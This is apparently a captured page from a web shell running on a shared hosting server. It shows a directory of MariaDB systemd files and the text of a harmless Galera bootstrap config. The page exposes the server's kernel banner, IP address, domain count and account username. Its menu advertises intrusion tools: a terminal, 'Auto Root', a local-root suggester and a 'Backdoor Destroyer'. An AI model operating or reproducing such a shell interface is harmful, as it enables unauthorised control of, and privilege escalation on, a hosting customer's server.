Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
mariadb114 /
support-files /
systemd /
Delete
Unzip
Name
Size
Permission
Date
Action
mariadb-extra@.socket
508
B
-rw-r--r--
2024-05-26 18:20
mariadb.service
5.81
KB
-rw-r--r--
2025-02-25 04:02
mariadb@.service
10.1
KB
-rw-r--r--
2024-05-26 18:20
mariadb@.socket
569
B
-rw-r--r--
2024-05-26 18:20
mysql.service
5.81
KB
-rw-r--r--
2025-02-25 04:02
mysqld.service
5.81
KB
-rw-r--r--
2025-02-25 04:02
use_galera_new_cluster.conf
676
B
-rw-r--r--
2024-05-26 18:15
Save
Rename
# # Install as /etc/systemd/system/mariadb@bootstrap.service.d/use_galera_new_cluster.conf # # MariaDB uses /usr/bin/galera_new_cluster # # This is here to help guide people that may have used Percona mysql@bootstrap # to the correct implementation. [Unit] ConditionPathExists= [Service] Type=oneshot Restart=no # Don't install or try to prepare for galera SST. ExecStartPre= # Override the multi instance service for a bootstrap start instance ExecStart= ExecStart=/usr/bin/echo "Please use galera_new_cluster to start the mariadb service with --wsrep-new-cluster" ExecStart=/usr/bin/false # This isn't a service meant to execute anything but a message ExecStartPost=